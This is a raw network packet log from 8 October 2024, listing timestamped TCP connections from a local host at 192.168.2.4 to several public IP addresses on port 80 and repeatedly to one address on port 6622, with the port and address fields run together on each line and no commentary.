                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:43.605273008 CEST5032980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:43.610588074 CEST805032944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:43.623238087 CEST5033080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:43.628487110 CEST805033054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:43.628572941 CEST5033080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:43.628751040 CEST5033080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:43.628762960 CEST5033080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:43.634253979 CEST805033054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:43.634267092 CEST805033054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:43.848334074 CEST662250327204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:43.848396063 CEST503276622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:43.848419905 CEST503276622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:43.854296923 CEST662250327204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:44.114336967 CEST503316622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:44.119550943 CEST662250331204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:44.120826960 CEST503316622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:44.124202967 CEST503316622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:44.129034996 CEST662250331204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:44.524947882 CEST805033054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:44.524962902 CEST805033054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:44.524985075 CEST805033054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:44.525116920 CEST5033080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:44.525116920 CEST5033080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:44.525116920 CEST5033080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:44.530103922 CEST805033054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:44.982419014 CEST5033280192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:44.989109039 CEST805033235.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:44.989240885 CEST5033280192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:44.991240978 CEST5033280192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:44.991240978 CEST5033280192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:44.996175051 CEST805033235.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:44.999907017 CEST805033235.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.633753061 CEST662250331204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.633959055 CEST503316622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.634001017 CEST503316622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.638988972 CEST662250331204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.743818045 CEST805033235.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.744004965 CEST5033280192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.744040966 CEST805033235.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.744132996 CEST5033280192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.748877048 CEST805033235.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.763916016 CEST5033380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.769435883 CEST805033354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.769522905 CEST5033380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.770490885 CEST5033380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.770509005 CEST5033380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.775427103 CEST805033354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.775772095 CEST805033354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.896207094 CEST503346622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.901247978 CEST662250334204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.901396990 CEST503346622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.906924963 CEST503346622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.911892891 CEST662250334204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:46.411123037 CEST5033380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:46.414352894 CEST5033580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:46.419302940 CEST805033554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:46.422835112 CEST5033580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:46.422952890 CEST5033580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:46.422954082 CEST5033580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:46.429342985 CEST805033554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:46.429403067 CEST805033554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.182699919 CEST805033554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.182912111 CEST805033554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.182960033 CEST5033580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.183063984 CEST5033580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.187885046 CEST805033554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.200845957 CEST5033680192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.206156969 CEST805033634.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.210613966 CEST5033680192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.211019993 CEST5033680192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.211042881 CEST5033680192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.215965986 CEST805033634.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.215977907 CEST805033634.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.425421953 CEST662250334204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.428905010 CEST503346622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.432451963 CEST503346622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.437602997 CEST662250334204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.692653894 CEST503376622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.697635889 CEST662250337204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.697746992 CEST503376622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.719719887 CEST503376622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.725064039 CEST662250337204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.958033085 CEST805033634.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.958077908 CEST805033634.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.958137989 CEST5033680192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.958353043 CEST5033680192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.963136911 CEST805033634.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.975963116 CEST5033880192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.981113911 CEST805033847.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.981194973 CEST5033880192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.981365919 CEST5033880192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.981389999 CEST5033880192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.986258984 CEST805033847.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.986268997 CEST805033847.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.158756971 CEST662250337204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.159065008 CEST503376622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.159406900 CEST503376622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.164382935 CEST662250337204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.319482088 CEST805033847.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.319550037 CEST805033847.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.319629908 CEST5033880192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.319844961 CEST5033880192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.324852943 CEST805033847.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.336781979 CEST5033980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.341944933 CEST805033954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.342015028 CEST5033980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.342642069 CEST5033980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.342683077 CEST5033980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.347734928 CEST805033954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.347783089 CEST805033954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.395948887 CEST503406622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.401087999 CEST662250340204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.401217937 CEST503406622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.406793118 CEST503406622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.411894083 CEST662250340204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.089999914 CEST805033954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.090184927 CEST805033954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.090199947 CEST5033980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.090230942 CEST5033980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.096584082 CEST805033954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.111700058 CEST5034180192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.116791010 CEST80503413.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.116940975 CEST5034180192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.143253088 CEST5034180192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.143253088 CEST5034180192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.148202896 CEST80503413.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.148217916 CEST80503413.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.411067963 CEST5034180192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.414383888 CEST5034280192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.531744003 CEST80503423.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.534864902 CEST5034280192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.535108089 CEST5034280192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.535192013 CEST5034280192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.540312052 CEST80503423.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.540323019 CEST80503423.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.899980068 CEST662250340204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.900226116 CEST503406622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.900392056 CEST503406622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.905302048 CEST662250340204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.010435104 CEST80503423.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.010452986 CEST80503423.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.010618925 CEST5034280192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.010742903 CEST5034280192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.015708923 CEST80503423.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.027403116 CEST5034380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.032362938 CEST805034318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.034765959 CEST5034380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.035286903 CEST5034380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.035286903 CEST5034380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.040141106 CEST805034318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.040152073 CEST805034318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.130178928 CEST503446622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.135067940 CEST662250344204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.135134935 CEST503446622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.142023087 CEST503446622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.147171974 CEST662250344204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.502176046 CEST805034318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.502490997 CEST805034318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.502530098 CEST5034380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.502588034 CEST5034380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.509107113 CEST805034318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.032882929 CEST5651480192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.038157940 CEST805651444.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.038230896 CEST5651480192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.038391113 CEST5651480192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.038418055 CEST5651480192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.043435097 CEST805651444.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.043447018 CEST805651444.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.501310110 CEST805651444.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.501992941 CEST805651444.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.502077103 CEST5651480192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.502243042 CEST5651480192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.508909941 CEST805651444.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.536648035 CEST5651580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.542057991 CEST80565153.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.544835091 CEST5651580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.545054913 CEST5651580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.545054913 CEST5651580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.550225973 CEST80565153.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.550237894 CEST80565153.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.616786003 CEST662250344204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.618787050 CEST503446622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.618866920 CEST503446622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.624456882 CEST662250344204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.849257946 CEST565166622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.854258060 CEST662256516204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.854352951 CEST565166622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.858822107 CEST565166622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.863591909 CEST662256516204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.021817923 CEST80565153.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.021934032 CEST80565153.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.022022009 CEST5651580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.022146940 CEST5651580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.027482033 CEST80565153.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.042264938 CEST5651780192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.047492981 CEST805651735.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.047564983 CEST5651780192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.047808886 CEST5651780192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.047843933 CEST5651780192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.052947998 CEST805651735.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.052959919 CEST805651735.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.798345089 CEST805651735.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.798635006 CEST805651735.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.798810005 CEST5651780192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.798958063 CEST5651780192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.804608107 CEST805651735.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.816536903 CEST5651880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.821670055 CEST805651818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.821800947 CEST5651880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.822160959 CEST5651880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.822180033 CEST5651880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.827068090 CEST805651818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.827120066 CEST805651818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.278577089 CEST805651818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.279172897 CEST805651818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.282726049 CEST5651880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.286417007 CEST5651880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.292707920 CEST805651818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.316983938 CEST662256516204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.317039013 CEST565166622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.317601919 CEST565166622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.322834969 CEST662256516204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.327730894 CEST5651980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.333769083 CEST805651954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.334769964 CEST5651980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.335050106 CEST5651980192.168.2.454.244.188.177
